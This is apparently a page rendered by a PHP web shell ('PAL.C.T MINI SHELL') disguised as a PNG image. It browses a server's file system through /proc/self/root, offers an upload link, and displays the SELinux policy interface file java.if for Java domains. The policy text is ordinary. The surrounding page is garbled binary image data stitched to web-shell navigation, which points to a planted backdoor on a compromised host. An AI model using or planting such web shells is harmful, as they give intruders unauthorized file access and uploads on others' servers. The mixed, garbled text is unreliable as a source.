php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /proc/self/root/usr/share/selinux/devel/include/apps/
upload
files >> //proc/self/root/usr/share/selinux/devel/include/apps/java.if

## <summary>Java virtual machine</summary>

########################################
## <summary>
##	Role access for java
## </summary>
## <param name="role">
##	<summary>
##	Role allowed access
##	</summary>
## </param>
## <param name="domain">
##	<summary>
##	User domain for the role
##	</summary>
## </param>
#
interface(`java_role',`
	gen_require(`
		type java_t, java_exec_t;
	')

	role $1 types java_t;

	# The user role is authorized for this domain.
	domtrans_pattern($2, java_exec_t, java_t)
	allow java_t $2:process signull;
	# Unrestricted inheritance from the caller.
	allow $2 java_t:process { noatsecure siginh rlimitinh };

	allow java_t $2:unix_stream_socket connectto;
	allow java_t $2:unix_stream_socket { read write };
	allow java_t $2:tcp_socket { read write };
')

#######################################
## <summary>
##	The role template for the java module.
## </summary>
## <desc>
##	<p>
##	This template creates a derived domains which are used
##	for java applications.
##	</p>
## </desc>
## <param name="role_prefix">
##	<summary>
##	The prefix of the user domain (e.g., user
##	is the prefix for user_t).
##	</summary>
## </param>
## <param name="user_role">
##	<summary>
##	The role associated with the user domain.
##	</summary>
## </param>
## <param name="user_domain">
##	<summary>
##	The type of the user domain.
##	</summary>
## </param>
#
template(`java_role_template',`
	gen_require(`
		type java_exec_t;
	')

	type $1_java_t;
	domain_type($1_java_t)
	domain_entry_file($1_java_t, java_exec_t)
	role $2 types $1_java_t;

	domain_interactive_fd($1_java_t)

	userdom_unpriv_usertype($1, $1_java_t)
	userdom_manage_tmpfs_role($2, $1_java_t)

	allow $1_java_t self:process { ptrace signal getsched execmem execstack };

	dontaudit $1_java_t $3:tcp_socket { read write };

	allow $3 $1_java_t:process { getattr ptrace noatsecure signal_perms };

	domtrans_pattern($3, java_exec_t, $1_java_t)

	corecmd_bin_domtrans($1_java_t, $1_t)

	dev_dontaudit_append_rand($1_java_t)

	files_execmod_all_files($1_java_t)

	fs_dontaudit_rw_tmpfs_files($1_java_t)

	optional_policy(`
		xserver_role($2, $1_java_t)
	')
')

########################################
## <summary>
##	Run java in javaplugin domain.
## </summary>
## <param name="domain">
##	<summary>
##	Domain allowed access.
##	</summary>
## </param>
#
template(`java_domtrans',`
	gen_require(`
		type java_t, java_exec_t;
	')

	domtrans_pattern($1, java_exec_t, java_t)
')

########################################
## <summary>
##	Execute java in the java domain, and
##	allow the specified role the java domain.
## </summary>
## <param name="domain">
##	<summary>
##	The type of the process performing this action.
##	</summary>
## </param>
## <param name="role">
##	<summary>
##	The role to be allowed the java domain.
##	</summary>
## </param>
#
interface(`java_run',`
	gen_require(`
		type java_t;
	')

	java_domtrans($1)
	role $2 types java_t;
')

########################################
## <summary>
##	Execute the java program in the unconfined java domain.
## </summary>
## <param name="domain">
##	<summary>
##	Domain allowed access.
##	</summary>
## </param>
#
interface(`java_domtrans_unconfined',`
	gen_require(`
		type unconfined_java_t, java_exec_t;
	')

	domtrans_pattern($1, java_exec_t, unconfined_java_t)
	corecmd_search_bin($1)
')

########################################
## <summary>
##	Execute the java program in the unconfined java domain.
## </summary>
## <param name="domain">
##	<summary>
##	Domain allowed access.
##	</summary>
## </param>
## <param name="role">
##	<summary>
##	Role allowed access.
##	</summary>
## </param>
#
interface(`java_run_unconfined',`
	gen_require(`
		type unconfined_java_t;
	')

	java_domtrans_unconfined($1)
	role $2 types unconfined_java_t;
	nsplugin_role_notrans($2, unconfined_java_t)
')


########################################
## <summary>
##	Allow read and write access to unconfined java shared memory.
## </summary>
## <param name="domain">
##	<summary>
##	Domain allowed access.
##	</summary>
## </param>
#
interface(`java_rw_shared_mem_unconfined',`
	gen_require(`
		type unconfined_java_t;
	')

	allow $1 unconfined_java_t:shm { unix_read unix_write create_shm_perms };
')

########################################
## <summary>
##	Execute the java program in the java domain.
## </summary>
## <param name="domain">
##	<summary>
##	Domain allowed access.
##	</summary>
## </param>
#
interface(`java_exec',`
	gen_require(`
		type java_exec_t;
	')

	can_exec($1, java_exec_t)
')
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`